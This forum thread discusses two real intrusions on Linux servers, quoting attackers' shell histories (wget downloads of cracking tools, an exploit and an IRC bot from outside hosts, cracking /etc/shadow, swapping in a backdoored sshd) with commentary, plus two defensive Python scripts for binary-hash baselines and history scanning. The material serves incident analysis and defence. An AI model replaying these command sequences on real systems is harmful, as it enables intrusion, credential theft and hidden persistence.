-
August 30th, 2005, 12:36 AM
#1
THIS is how you hack a web server!
From: steve@example.org
To: incidents@securityfocus.com
Subject: SSH compiled with backdoor
Hi!
One of my web servers was hacked on July 17, 2005. bash_history
showed:
w
wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf
john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd
../run;./john /etc/shadow
wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm
-rf sshd.tar.gz;cd sshd;cd apps/ssh
pico genx.h
pico genx.h
pico ssh2includes.h
cd ../..
./configure --without-x
make
make install
mkdir /lib/java
cp /usr/sbin/sshd a
mv a /lib/java
rm -rf /usr/sbin/sshd
cp /usr/local/sbin/sshd /usr/sbin
/etc/rc.d/init.d/sshd restart
/etc/rc.d/init.d/ssh restart
locate init.d
/etc/init.d/sshd restart
w
reboot
According to john, a couple of users had weak passwords, but root
seemed well protected. From looking in all the bash_history, it appears the
hacker came in from the website account, and did an su from there.
I found this about a month later when I logged into the box, did an ls,
only to be met by a seg fault. A ps x showed mech.tgz trying to be
downloaded, and a bunch of other CRON processes running. The auth log
didn't show other logins, though, so the sshd they installed must have had
logging turned off for the backdoor they installed.
I filled out an abuse form at geocities for the accounts hosting the
software after downloading the software (I couldn't find the tgz files on
my system).
Last showed:
reboot   system boot  2.4.18-bf2.4    Sun Jul 17 18:15          (37+11:47)
website  pts/0        193.231.77.74   Sun Jul 17 17:42 - down   (00:27)
website  pts/1        193.231.77.74   Sun Jul 17 17:05 - 17:26  (00:20)
website  pts/0        211.43.207.169  Sun Jul 17 16:26 - 17:41  (01:14)
whois says:
inetnum: 193.231.77.0 - 193.231.77.255
netname: DATANET-RO
descr: Starnets - Datanet
country: RO
address: DATA NET
address: Str. Ioan N. Roman Nr. 13
address: Constanta, cod 900199, ROMANIA
Best Regards,
Steve
----------------
-
August 30th, 2005, 01:03 AM
#2
**** forgot something:
I posted this because I thought it was very interesting and it showed a common way to hack a computer running a Unix OS.
w
The first command they ran was "w" which was probably to see who was online and if root was sitting at the console or not and OF COURSE check the uptime maybe to take a guess as to when the last reboot was. This helps find an exploit that the machine may not have installed. Though this tech works better on Windows where EVERY patch needs a reboot.
wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf
They used wget to grab a file on their own website which was a hacked version of a common application used by admin.
john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd
../run;./john /etc/shadow
They remove the downloaded file so the admin doesn't find it.
wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm
-rf sshd.tar.gz;cd sshd;cd apps/ssh
pico genx.h
pico genx.h
pico ssh2includes.h
Editing the header file.
cd ../..
./configure --without-x
make
make install
Installing the backdoored app.
mkdir /lib/java
cp /usr/sbin/sshd a
mv a /lib/java
rm -rf /usr/sbin/sshd
Removing the actual applications to make room for their hacked copy.
cp /usr/local/sbin/sshd /usr/sbin
/etc/rc.d/init.d/sshd restart
/etc/rc.d/init.d/ssh restart
locate init.d
/etc/init.d/sshd restart
A mild **** up
w
Check if anyone is going to notice a reboot
reboot
Pow.
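The step this thread turns on is the swap of /usr/sbin/sshd for a freshly built copy, with the distro binary stashed in /lib/java. Once sshd itself is the thing lying, auth logs cannot be trusted, so the check has to come from a hash baseline recorded before the compromise and kept off the box. The script below is an added example written for this thread, not code from the original post: it hashes a watched set of daemon paths, stores the baseline as JSON, and reports binaries that changed, vanished, or newly appeared (such as a make install target in /usr/local/sbin). The demo() function replays the swap in a scratch directory with constructed stand-in files; the paths and file contents are assumptions for the demonstration.

```python
import hashlib
import json
import os
import shutil
import tempfile

# Paths a defender would typically watch on a box like the one in the thread.
# Assumed list; extend it for the daemons you actually run.
DEFAULT_WATCHED = [
    "/usr/sbin/sshd",
    "/usr/local/sbin/sshd",
    "/usr/sbin/crond",
    "/bin/login",
]


def sha256_of(path):
    """Hex SHA-256 of a file, read in chunks so large binaries are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(paths):
    """Record hash, size and permission bits for every watched path that exists."""
    baseline = {}
    for p in paths:
        if os.path.isfile(p):
            st = os.stat(p)
            baseline[p] = {
                "sha256": sha256_of(p),
                "size": st.st_size,
                "mode": st.st_mode & 0o7777,
            }
    return baseline


def save_baseline(baseline, dest):
    """Write the baseline as JSON. Keep dest off the host (or on read-only media):
    an attacker with root, as here, can rewrite a baseline stored locally."""
    with open(dest, "w") as f:
        json.dump(baseline, f, indent=2, sort_keys=True)


def load_baseline(src):
    with open(src) as f:
        return json.load(f)


def compare_baseline(baseline, paths):
    """Compare the current state of paths against a saved baseline.
    changed: hash differs (binary replaced or patched)
    missing: watched binary gone (rm -rf /usr/sbin/sshd before the copy-over)
    new:     watched path that did not exist at baseline time (make install output)"""
    findings = {"changed": [], "missing": [], "new": []}
    for p, rec in baseline.items():
        if not os.path.isfile(p):
            findings["missing"].append(p)
        elif sha256_of(p) != rec["sha256"]:
            findings["changed"].append(p)
    for p in paths:
        if p not in baseline and os.path.isfile(p):
            findings["new"].append(p)
    return findings


def demo():
    """Replay the thread's sequence in a scratch tree with constructed files:
    take a baseline, then 'make install' a new sshd and copy it over the distro one."""
    root = tempfile.mkdtemp()
    try:
        sshd = os.path.join(root, "usr/sbin/sshd")
        local_sshd = os.path.join(root, "usr/local/sbin/sshd")
        for d in ("usr/sbin", "usr/local/sbin"):
            os.makedirs(os.path.join(root, d))
        with open(sshd, "wb") as f:
            f.write(b"ORIGINAL-DISTRO-SSHD")  # constructed stand-in for the real binary
        watched = [sshd, local_sshd]
        baseline_file = os.path.join(root, "baseline.json")
        save_baseline(build_baseline(watched), baseline_file)

        # The intrusion: a rebuilt sshd lands in /usr/local/sbin and replaces /usr/sbin/sshd.
        with open(local_sshd, "wb") as f:
            f.write(b"REBUILT-SSHD-WITH-EDITED-HEADERS")  # constructed stand-in
        shutil.copy(local_sshd, sshd)

        findings = compare_baseline(load_baseline(baseline_file), watched)
        return {k: [os.path.relpath(p, root) for p in v] for k, v in findings.items()}
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

In production the baseline would be built from DEFAULT_WATCHED right after install, copied off the host, and the comparison run from a known-good boot (live CD) rather than from the possibly backdoored system, since the original post shows the attacker also restarted the service and rebooted.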
-
August 30th, 2005, 01:28 AM
#3
Tight. And it shows it wasn't a script that did this...or if it was, it was interrupted and manually completed. I wonder how long that took to do? Reading through it, I feel a sense of urgency for the punk. Not that it matters, really. I don't know about you guys, but if I am so paranoid that I have to run w every few minutes to see who's doing what, I need a beer, a valium, and a new line of work.
"Data is not necessarily information. Information does not necessarily lead to knowledge. And knowledge is not always sufficient to discover truth and breed wisdom." --Spaf
Anyone who is capable of getting themselves made president should on no account be allowed to do the job. --Douglas Adams (1952-2001)
"...people find it far easier to forgive others for being wrong than being right." - Albus Percival Wulfric Brian Dumbledore
-
August 30th, 2005, 01:36 AM
#4
Yah, looks a bit paranoid, but if you're stealin, you keep looking over your shoulder to see if anyone's watching you. That's how they catch shoplifters in retail. Gotta admit the kid's good, but only if the dl'd file is untraceable (did he go to the library or school computer lab to upload it the first time out?). Else with enough log checking and cooperation he can be found.
Even a broken watch is correct twice a day.
Which coder said that nobody could outcode Microsoft in their own OS? Write a bit and make a fortune!
-
August 30th, 2005, 02:04 AM
#5
Yah, looks a bit paranoid, but if you're stealin, you keep looking over your shoulder to see if anyone's watching you.
I'm such an arrogant egotistical cocky self centered ****er!
Yeah, we really are 138.
-
August 30th, 2005, 03:10 AM
#6
LOL!
Does this face look almost mean?
-
August 30th, 2005, 03:29 AM
#7
Your face looks like... my ass.
Ermmm... goatse style.
You're a sexy man.
http://crime.about.com/od/history/qt...ords_gracy.htm
-
August 30th, 2005, 05:01 AM
#8
And yet they didn't sanitize the bash_history?
cheers,
catch
-
August 30th, 2005, 08:41 AM
#9
I had something along these lines happen to a box of a friend.. Just a 'toy' linux box..
An ssh 'knocker' found a weak user (user: print, passwd: print (that's plain stupid))
A few minutes later came the 'hacker'
Or should I say lamer.. let's dissect..
.bash_history (changed password)
Code:
w
cd /var/tmp
ls
hostname -f
mkdir " "
cd " "
A nice hard to find folder
Code:
ls
pwd
wget esteticu.org/mremap_pte
chmod +x mremap_pte
./mremap_pte
old kernel exploit (ptrace) won't work
Dude.. you aren't root.. that won't work
Code:
ls
rm -rf hide
rm -rf hide.tgz
wget ideo.go.ro/psy6667.tgz
tar xzvf psy6667.tgz
rm -rf psy6667.tgz
cd psybnc
chmod +x psybnc
mv psybnc backup
PATH="./"
backup
ls
rm -rf backup
kilall -9 psybnc
rm -rf psybnc
exit
Ok.. so you installed a irc-bot as a 'normal' user behind a NAT (he could have known this won't work) while you have a valid login (with your own password)..
Code:
export PATH='.'
psybnc
ls
exit
Still won't work
Code:
export PATH='.'
crond
exit
I don't get it.. perhaps there is also a 'fake' crond exec in the psybnc package..
typo
Code:
w
cd /var/tmp
ls
cd " "
ls
killall -9 psybnc
rm -rf psbnc
uname -a
Should have done that a bit earlier.. could have saved you some time
Code:
wget www.skimy.go.ro/psy.tgz
tar xzvf psy.tgz
cd psybnc
sh
ls
killall -9 psybnc
rm -rf psybnc
rm -rf backup
cd ..
ls
rm -rf psy.tgz
rm -rf psybnc
OK he found out such a bot won't work behind a NAT
Code:
wget artist.idilis.ro/xpl.tgz
tar xzvf xpl.tgz
rm -rf xpl.tgz
mv mech ".. .bot"
cd ".. .bot"
sh
And that's where the bot sent enough mail to trigger the ISP to kill the connection :P
Leaving the poor 'hacker' disconnected and all the evidence of his mishaps there for us to look at...
ASCII stupid question, get a stupid ANSI.
When in Russia, pet a PETSCII.
Get your ass over to SLAYRadio the best station for C64 Remixes !
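Both histories in this thread (the sshd swap in post #1 and the psybnc attempts above) are worth more than a read-through: the same shapes recur, so a small scanner can pull them out of any recovered .bash_history. The script below is an added example for this thread, not code from either poster. The rules are my own heuristics: fetch-then-extract-then-delete chains, anything that copies, moves or removes files under system binary directories, directory names that are only whitespace or dot-prefixed with embedded spaces (" ", ".. .bot"), PATH set to the current directory, init.d restarts, /etc/shadow access, and recon commands. SAMPLE_HISTORY is a constructed history assembled from lines quoted in the thread, not the actual file from either box.

```python
import re
import shlex

# Constructed sample modelled on the histories quoted in this thread, one command per line.
SAMPLE_HISTORY = "\n".join([
    "w",
    "wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf john-1.6.tar.gz;"
    "rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd ../run;./john /etc/shadow",
    "pico genx.h",
    "./configure --without-x",
    "make install",
    "mkdir /lib/java",
    "cp /usr/sbin/sshd a",
    "mv a /lib/java",
    "rm -rf /usr/sbin/sshd",
    "cp /usr/local/sbin/sshd /usr/sbin",
    "/etc/init.d/sshd restart",
    'mkdir " "',
    'cd " "',
    'PATH="./"',
    "export PATH='.'",
    'mv mech ".. .bot"',
    "ls",
    "reboot",
])

SYSTEM_DIRS = ("/usr/sbin/", "/usr/local/sbin/", "/sbin/", "/bin/", "/usr/bin/", "/lib/")
FETCHERS = {"wget", "curl", "ftp", "tftp", "lynx"}
RECON = {"w", "who", "uname", "hostname", "id", "last"}
FILE_OPS = {"cp", "mv", "rm", "ln", "mkdir"}


def split_commands(line):
    """Break a history line on ';' into simple commands; returns a list of token lists.
    shlex keeps quoted arguments such as " " intact so hidden names survive."""
    cmds = []
    for seg in line.split(";"):
        seg = seg.strip()
        if not seg:
            continue
        try:
            toks = shlex.split(seg)
        except ValueError:          # unbalanced quotes: fall back to a plain split
            toks = seg.split()
        if toks:
            cmds.append(toks)
    return cmds


def is_hidden_name(arg):
    """Whitespace-only names or dot-prefixed names with embedded whitespace."""
    return arg.strip() == "" or (arg.startswith(".") and any(c.isspace() for c in arg))


def path_points_to_cwd(tok):
    """True for PATH=. , PATH=./ or any PATH whose list contains '.' or './'."""
    m = re.match(r"^PATH=(.*)$", tok)
    return bool(m) and any(p in (".", "./") for p in m.group(1).split(":"))


def classify_line(line):
    """Return the set of indicator tags that fire for one history line."""
    tags = set()
    cmds = split_commands(line)
    names = [c[0] for c in cmds]
    if any(n in FETCHERS for n in names):
        tags.add("fetch-extract-cleanup" if any(n in ("tar", "rm") for n in names) else "download")
    for toks in cmds:
        name, args = toks[0], toks[1:]
        if name in FILE_OPS and any(a.startswith(SYSTEM_DIRS) for a in args):
            tags.add("system-path-modified")
        if name in ("mkdir", "cd", "mv") and any(is_hidden_name(a) for a in args):
            tags.add("hidden-dir-name")
        if name == "make" and "install" in args:
            tags.add("local-install")
        if name in RECON:
            tags.add("recon")
        if "/init.d/" in name and "restart" in args:
            tags.add("service-restart")
        if "/etc/shadow" in args:
            tags.add("shadow-access")
        if name == "reboot":
            tags.add("reboot")
        if any(path_points_to_cwd(t) for t in toks):
            tags.add("path-hijack")
    return tags


def scan(history_text):
    """Scan a whole history; return only the lines that fired, with sorted tags."""
    findings = []
    for n, line in enumerate(history_text.splitlines(), start=1):
        tags = classify_line(line)
        if tags:
            findings.append({"line": n, "cmd": line, "tags": sorted(tags)})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_HISTORY):
        print(f"{f['line']:3d}  {', '.join(f['tags']):40s}  {f['cmd'][:60]}")
```

The scanner is only useful when the history survives, which is the point catch made above; it complements, rather than replaces, shipping auth and shell logs off the host as they are written.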
-
August 30th, 2005, 09:09 AM
#10
Very nice these dissections ... I like 'em for seeing how they do it ... but then again if you get the logs and can see what they did, doesn't that mean they forgot to delete their evidence??.. Like catch said ! So that gets the discussion of how good they are or they just don't care maybe.
But of course if they did it from a public computer then would the evidence matter ?
Mmm wait it might if the place where the public computer stands keeps a record of who is using it (by means of driver license etc.. but these can be fake also)... just ranting, never mind
Code:
ww
I don't think it's a typo ...he got nervous and started to stutter
C.
Back when I was a boy, we carved our own IC's out of wood.